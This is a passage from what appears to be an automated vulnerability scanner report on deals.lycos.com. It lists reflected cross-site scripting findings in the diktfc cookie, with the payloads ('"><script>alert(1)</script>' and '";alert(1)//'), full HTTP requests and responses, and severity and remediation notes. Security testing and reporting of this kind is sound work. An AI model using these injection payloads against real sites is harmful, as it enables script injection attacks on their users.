Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A46acf"%3balert(1)//6a7aece2843; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:30 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/samsung-nx10-15mp-dslr-camera-lens-423-413374",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A46acf";alert(1)//6a7aece2843"
});
</script>
...[SNIP]...

3.235. http://deals.lycos.com/deal/samsung-sunburst-a697-cell-phone-50-414188 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/samsung-sunburst-a697-cell-phone-50-414188

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4046a"><script>alert(1)</script>6e957a235e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/samsung-sunburst-a697-cell-phone-50-414188 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4046a"><script>alert(1)</script>6e957a235e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:57 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
"http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/samsung-sunburst-a697-cell-phone-50-414188&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4046a"><script>alert(1)</script>6e957a235e&amp;cj=1" alt="tracker" />
...[SNIP]...

3.236. http://deals.lycos.com/deal/samsung-sunburst-a697-cell-phone-50-414188 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/samsung-sunburst-a697-cell-phone-50-414188

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8f2f"%3balert(1)//00ef4809ce3 was submitted in the diktfc cookie. This input was echoed as c8f2f";alert(1)//00ef4809ce3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/samsung-sunburst-a697-cell-phone-50-414188 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac8f2f"%3balert(1)//00ef4809ce3; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:58 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17740

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/samsung-sunburst-a697-cell-phone-50-414188",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac8f2f";alert(1)//00ef4809ce3"
});
</script>
...[SNIP]...

3.237. http://deals.lycos.com/deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20a9f"><script>alert(1)</script>2045b97a5bb was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A20a9f"><script>alert(1)</script>2045b97a5bb; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:23 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"